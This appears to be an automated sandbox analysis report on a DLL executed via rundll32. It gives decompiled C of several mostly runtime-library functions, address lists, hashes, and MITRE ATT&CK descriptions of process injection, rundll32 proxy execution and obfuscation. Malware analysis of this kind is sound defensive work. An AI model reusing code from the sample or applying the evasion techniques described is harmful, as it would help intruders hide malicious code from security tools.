0x6e25dbff
0x6e25dc01
0x00000000
0x00000000
0x6e25dc03
0x6e25dc08
0x6e25dc0a
0x6e25dc0a
0x6e25dc10
0x00000000
0x00000000
0x6e25dc15
0x6e25dc33
0x6e25dc33
0x6e25dc35
0x6e25dc5a
0x00000000
0x6e25dc5f
0x6e25dc52
0x00000000
0x00000000
0x6e25dc54
0x00000000
0x6e25dc54
0x6e25dc17
0x6e25dc1f
0x00000000
0x00000000
0x6e25dc21
0x6e25dc24
0x6e25dc2a
0x00000000
0x00000000
0x00000000
0x6e25dc2c
0x6e25dc2e
0x6e25dc30
0x6e25dc30
0x00000000
0x6e25dc30
0x6e25dbe1
0x6e25dbe9
0x00000000
0x00000000
0x6e25dbeb
0x6e25dbee
0x6e25dbf4
0x00000000
0x00000000
0x00000000
0x6e25dbf4
0x6e25dbfa
0x6e25dbfc
0x6e25dbfc
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E25DE50,?,00000050,?,?,?,?,?), ref: 6E25DC8A

Strings

OCP, xrefs: 6E25DC03
ACP, xrefs: 6E25DBCD

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
Instruction ID: 765538ebe0c3eaa7bb62265b682247ad23f188a8fce3eedb0c41bb3cc0437e93
Opcode Fuzzy Hash: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
Instruction Fuzzy Hash: AE21C466A6410FA7E754CFD8CB00B8B73ABAB45B53F528424E90AD7308E772D961CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E21FAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E21FAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6e2c6e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6E22079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6e2c506c; // 0x2b33ced3
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6e2c506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6E24A8CA(_t19, 0x6e2c6e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6E24A8CA(_t25, 0x6e2c6e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6e2c6e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6E2207A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6E220990(__ebx, _t49, 0x6e2c2780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6e1e0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6e1e003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6e1e0000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6e1e0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6e1e0018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6e1e0018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6E21F931(0x6e1e0000, _a4 - 0x6e1e0000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x6e21faf6
0x6e21fafd
0x6e21fb00
0x6e21fb02
0x6e21fb09
0x6e21fb09
0x6e21fb0e
0x6e21fb10
0x6e21fb38
0x6e21fb38
0x6e21fb40
0x6e21fb49
0x6e21fb51
0x6e21fb53
0x6e21fb53
0x6e21fb59
0x6e21fb5c
0x6e21fb5f
0x6e21fb62
0x6e21fb63
0x6e21fb64
0x6e21fb6a
0x6e21fb6d
0x6e21fb73
0x6e21fb76
0x6e21fb77
0x6e21fb78
0x00000000
0x6e21fb12
0x6e21fb12
0x6e21fb14
0x00000000
0x6e21fb16
0x6e21fb1b
0x6e21fb21
0x6e21fb23
0x6e21fb34
0x6e21fb34
0x6e21fb25
0x6e21fb2a
0x6e21fb30
0x6e21fb32
0x6e21fb7a
0x6e21fb7a
0x6e21fb81
0x00000000
0x00000000
0x00000000
0x6e21fb32
0x6e21fb23
0x6e21fb14
0x6e21fb85
0x6e21fb04
0x6e21fb04
0x6e21fb07
0x6e21fb88
0x6e21fb8d
0x6e21fb95
0x6e21fb9a
0x6e21fba3
0x6e21fbaa
0x6e21fc09
0x6e21fc09
0x6e21fc10
0x6e21fc10
0x6e21fbac
0x6e21fbac
0x6e21fbb1
0x6e21fbbb
0x00000000
0x6e21fbbd
0x6e21fbc2
0x6e21fbc9
0x00000000
0x6e21fbcb
0x6e21fbd7
0x6e21fbde
0x6e21fbe0
0x00000000
0x6e21fbe2
0x6e21fbe2
0x6e21fbe6
0x00000000
0x6e21fbe8
0x6e21fbe8
0x6e21fbef
0x6e21fbef
0x6e21fbe6
0x6e21fbe0
0x6e21fbc9
0x6e21fbbb
0x6e21fc15
0x6e21fc21
0x00000000
0x00000000
0x00000000
0x6e21fb07
0x6e21faf8
0x6e21fafb
0x6e21fafb

Strings

`n,n, xrefs: 6E21FB65
Tn,n, xrefs: 6E21FB44

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Tn,n$`n,n
API String ID: 0-3894424707
Opcode ID: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
Instruction ID: 0fd38b8e3836c9714727457c7d25762572ff14ae64ee4c53b92351e2029f33ae
Opcode Fuzzy Hash: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
Instruction Fuzzy Hash: FD11B276C1461E9BEF80CEE8C454ADF77E79F0AB25F104166D921EB280D6B0C7018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E204197, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E204197(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t23;
				void* _t25;
				char* _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t58;
				char* _t59;
				void* _t61;
				void* _t62;

				_t56 = __edi;
				_t54 = __edx;
				_t44 = __ebx;
				E6E2200E0(0x6e2680c1, __ebx, __edi, __esi, 0x70);
				_t23 =  *0x6e2dce68; // 0x1
				_t58 =  *((intOrPtr*)(_t61 + 8));
				if(_t23 == 0) {
					_push(1);
					 *0x6e2dce68 = 1;
					E6E203751(__ebx, _t61 - 0x60, __edi, _t58);
					 *0x6e2dce70 =  *((intOrPtr*)(_t61 - 0x60));
					 *0x6e2dce74 =  *((intOrPtr*)(_t61 - 0x5c));
					_t23 =  *0x6e2dce68; // 0x1
				}
				if(_t23 != 1) {
					_t25 = E6E201F9A(_t61 - 0x40, E6E2050B4());
					 *(_t61 - 4) = 1;
					_push(E6E2040E5(_t61 - 0x58, __eflags, _t25));
					 *(_t61 - 4) = 2;
					E6E200BC1(_t44, _t61 - 0x7c, _t56, _t58, __eflags);
					_pop(_t49);
					E6E223D74(_t61 - 0x7c, 0x6e2c347c);
					asm("int3");
					__eflags = 0;
					_push(_t58);
					_t59 = _t49;
					 *_t59 = 0;
					 *((intOrPtr*)(_t59 + 8)) = 0;
					 *((intOrPtr*)(_t59 + 0xc)) = 0;
					E6E205DAB(_t49,  *((intOrPtr*)(_t62 + 4)));
					return _t59;
				} else {
					E6E201F9A(_t61 - 0x28, _t58);
					 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
					_t51 =  *0x6e2dce70; // 0x716130
					E6E205C7E(_t51, _t54, _t61 - 0x60, _t61 - 0x28);
					E6E202B76(_t61 - 0x28);
					return E6E22008A( *((intOrPtr*)(_t61 - 0x60)) + 0x28, _t44, _t56, _t58);
				}
			}

0x6e204197
0x6e204197
0x6e204197
0x6e20419e
0x6e2041a3
0x6e2041a8
0x6e2041ad
0x6e2041af
0x6e2041b4
0x6e2041bb
0x6e2041c3
0x6e2041cb
0x6e2041d0
0x6e2041d0
0x6e2041d7
0x6e204218
0x6e204221
0x6e20422d
0x6e204231
0x6e204235
0x6e20423b
0x6e204245
0x6e20424a
0x6e20424f
0x6e204251
0x6e204252
0x6e204254
0x6e204256
0x6e204259
0x6e20425c
0x6e204264
0x6e2041d9
0x6e2041dd
0x6e2041e2
0x6e2041e9
0x6e2041f4
0x6e2041fc
0x6e20420c
0x6e20420c

APIs

__EH_prolog3_GS.LIBCMT ref: 6E20419E

Part of subcall function 6E203751: __EH_prolog3_GS.LIBCMT ref: 6E203758

Part of subcall function 6E201F9A: _strlen.LIBCMT ref: 6E201FAF

Part of subcall function 6E200BC1: __EH_prolog3_GS.LIBCMT ref: 6E200BC8

__CxxThrowException@8.LIBVCRUNTIME ref: 6E204245

Part of subcall function 6E223D74: RaiseException.KERNEL32(00000000,?,u n,00000000,?,?,?,?,?,?,?,6E2075E7,00000000,6E2C14C0,?), ref: 6E223DD4

Strings

0aq, xrefs: 6E2041C3, 6E2041E9

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: H_prolog3_$ExceptionException@8RaiseThrow_strlen
String ID: 0aq
API String ID: 2104475553-2160994254
Opcode ID: 90c6127a06ef0106ffbf3f2f93c587d931b522a95673882220ae1bc2282ee29c
Instruction ID: 60fe33f6a305f6a4276c9dd6efe0bc28442377ec2da942f9e420b6f678abb0e0
Opcode Fuzzy Hash: 90c6127a06ef0106ffbf3f2f93c587d931b522a95673882220ae1bc2282ee29c
Instruction Fuzzy Hash: BB219FBAD0020C9FDB14DFE4C858EDDB7BFAF2A704F04491AD505AB281DBB05945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E2059F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 6E205A52

Strings

:B n, xrefs: 6E205A35
[json.exception., xrefs: 6E2059FC

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID: :B n$[json.exception.
API String ID: 1075933841-3849622167
Opcode ID: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction ID: 218fd96fd83dae967e78c502c145d0d31e2c87026cedc3ff35e28bf0706639ee
Opcode Fuzzy Hash: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction Fuzzy Hash: E50108765042195F8314CF58DCC0C4BB7DEEE892147100A6DF429C7341EB31E90587A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E203751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6E203751(void* __ebx, signed int* __ecx, void* __edi, void* __esi) {
				signed int _t35;
				void* _t42;
				signed int _t46;
				signed char _t51;
				signed char _t53;
				signed int* _t55;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr* _t60;

				E6E2200E0(0x6e268012, __ebx, __edi, __esi, 0x38);
				_t58 = __ecx;
				_t51 =  *((intOrPtr*)(_t59 + 8));
				_t35 = _t51 & 0x000000ff;
				if(_t35 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t51;
					if(_t51 != 0) {
						goto L4;
					} else {
						E6E201F9A(_t59 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
						_t53 = _t59 - 0x44;
						E6E200C7C(__ebx, _t53, __edi, _t58, __eflags);
						 *_t60 = 0x6e2c3430;
						_t42 = E6E223D74(_t59 - 0x44, _t59 - 0x28);
						asm("scasb");
						asm("aaa");
						 *(_t58 + 0x71) =  *(_t58 + 0x71) & _t53;
						asm("aaa");
						 *(_t58 - 0x7e) =  *(_t58 - 0x7e) & _t53;
						asm("aaa");
						 *(_t58 - 0x77) =  *(_t58 - 0x77) & _t53;
						asm("aaa");
						 *(_t58 - 0x69) =  *(_t58 - 0x69) & _t53;
						asm("aaa");
						 *(_t58 - 0x64) =  *(_t58 - 0x64) & _t53;
						asm("aaa");
						 *(_t58 - 0x64) =  *(_t58 - 0x64) & _t53;
						asm("aaa");
						 *(_t58 - 0x5b) =  *(_t58 - 0x5b) & _t53;
						asm("aaa");
						 *(_t58 - 0x70) =  *(_t58 - 0x70) & _t53;
						asm("aaa");
						 *(_t58 - 0x75) =  *(_t58 - 0x75) & _t53;
						0xafabfb26();
						_t55 = _t53 + 1 + _t42 + 0xae;
						asm("clc");
						_t46 =  *_t55;
						__eflags = _t46 - _t55[1];
						_t32 = _t46 == _t55[1];
						__eflags = _t32;
						return _t46 & 0xffffff00 | _t32;
					}
				} else {
					switch( *((intOrPtr*)(_t35 * 4 +  &M6E2037E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t48 = E6E204B1C(__ebx, __edi, __ecx, _t61);
							goto L3;
						case 2:
							__eax = E6E204B64(__eflags);
							goto L3;
						case 3:
							__eax = E6E204B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6E204BCF(__eflags);
							L3:
							 *_t58 = _t48;
							L4:
							return E6E22008A(_t58, _t49, _t56, _t58);
							goto L14;
					}
				}
				L14:
			}

0x6e203758
0x6e20375d
0x6e20375f
0x6e203762
0x6e203768
0x6e2037b3
0x6e2037b6
0x6e2037b8
0x00000000
0x6e2037ba
0x6e2037c2
0x6e2037c7
0x6e2037cf
0x6e2037d2
0x6e2037da
0x6e2037e2
0x6e2037e9
0x6e2037ea
0x6e2037eb
0x6e2037ee
0x6e2037ef
0x6e2037f2
0x6e2037f3
0x6e2037f6
0x6e2037f7
0x6e2037fa
0x6e2037fb
0x6e2037fe
0x6e2037ff
0x6e203802
0x6e203803
0x6e203806
0x6e203807
0x6e20380a
0x6e20380b
0x6e203811
0x6e203818
0x6e20381a
0x6e20381d
0x6e20381f
0x6e203822
0x6e203822
0x6e203825
0x6e203825
0x6e20376a
0x6e20376a
0x00000000
0x6e2037ae
0x00000000
0x00000000
0x6e203771
0x00000000
0x00000000
0x6e203782
0x00000000
0x00000000
0x6e203789
0x00000000
0x00000000
0x6e203797
0x00000000
0x00000000
0x6e20379c
0x6e20379f
0x00000000
0x00000000
0x6e2037a5
0x6e2037a8
0x00000000
0x00000000
0x6e203790
0x6e203776
0x6e203776
0x6e203778
0x6e20377f
0x00000000
0x00000000
0x6e20376a
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 6E203758
__CxxThrowException@8.LIBVCRUNTIME ref: 6E2037E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E2037BA

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
Instruction ID: c772e41be5f7b2f332d735131a26b9f89d4a247c623edb0674636bff832eaf76
Opcode Fuzzy Hash: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
Instruction Fuzzy Hash: 9A0180B586860DAFD7129FE5C848FECB3FBBF26316F10891A9080960E0EB741685C752

Uniqueness

Uniqueness Score: -1.00%

Function 6E254B79, Relevance: 5.1, APIs: 4, Instructions: 139
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E254B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6E231F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6E242281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6E242281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6E258CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6E242281())) = 0x16;
					return E6E24215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x6e254b79
0x6e254b82
0x6e254b87
0x6e254b8a
0x6e254b8e
0x6e254b9d
0x6e254ba0
0x6e254bc0
0x6e254bc5
0x6e254bc8
0x6e254bca
0x6e254c98
0x6e254c9e
0x6e254cb3
0x6e254cbf
0x6e254cc5
0x6e254cc7
0x6e254cd6
0x6e254cd6
0x6e254cd6
0x6e254cd9
0x6e254cd9
0x6e254cdd
0x6e254cdf
0x6e254ce2
0x6e254ce2
0x6e254ce2
0x6e254ce2
0x00000000
0x6e254ce9
0x6e254cce
0x00000000
0x6e254cce
0x6e254ca0
0x6e254ca3
0x6e254ca3
0x6e254ca6
0x6e254ca6
0x6e254ca8
0x6e254ca9
0x6e254ca9
0x6e254cad
0x00000000
0x6e254cad
0x6e254bd0
0x6e254bd6
0x6e254c03
0x6e254c0f
0x6e254c15
0x6e254c17
0x00000000
0x00000000
0x6e254c1d
0x6e254c23
0x6e254c26
0x6e254c82
0x6e254c87
0x6e254c8f
0x00000000
0x6e254c8f
0x6e254c28
0x6e254c2b
0x6e254c2d
0x6e254c30
0x6e254c32
0x6e254c34
0x6e254c6a
0x6e254c78
0x6e254c7e
0x6e254c80
0x6e254c94
0x00000000
0x6e254c94
0x00000000
0x00000000
0x00000000
0x00000000
0x6e254c36
0x6e254c36
0x6e254c36
0x6e254c39
0x6e254c3c
0x6e254c3e
0x00000000
0x00000000
0x6e254c48
0x6e254c4f
0x6e254c52
0x6e254c54
0x6e254c5c
0x6e254c5c
0x6e254c5f
0x6e254c60
0x6e254c63
0x6e254c65
0x00000000
0x00000000
0x00000000
0x6e254c65
0x6e254c56
0x6e254c57
0x6e254c5a
0x00000000
0x00000000
0x00000000
0x6e254c5a
0x6e254c67
0x00000000
0x6e254c67
0x6e254bd8
0x6e254bda
0x00000000
0x00000000
0x6e254be0
0x6e254be3
0x6e254be7
0x6e254bea
0x6e254bee
0x00000000
0x00000000
0x6e254bf4
0x6e254bf5
0x6e254bf8
0x6e254bfa
0x00000000
0x00000000
0x00000000
0x6e254bfc
0x00000000
0x6e254be3
0x6e254ba7
0x00000000
0x6e254bb2
0x6e254b94
0x6e254b9a
0x00000000
0x6e254b9a
0x6e254cf1

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,924FAE9A,924FAE9A,00000000,00000000,00000000,00000000,00000000), ref: 6E254C0F
GetLastError.KERNEL32 ref: 6E254C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E254C78

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
Instruction ID: 8775ab3d8009a28f0ed7ee8adb2f68d99103e5b50beb331d8458cda2a1d64c2a
Opcode Fuzzy Hash: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
Instruction Fuzzy Hash: 3E41F77560424FAFDB518FD5C944BAAB7BAAF81322F104159E857AB390DB318932CB50

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

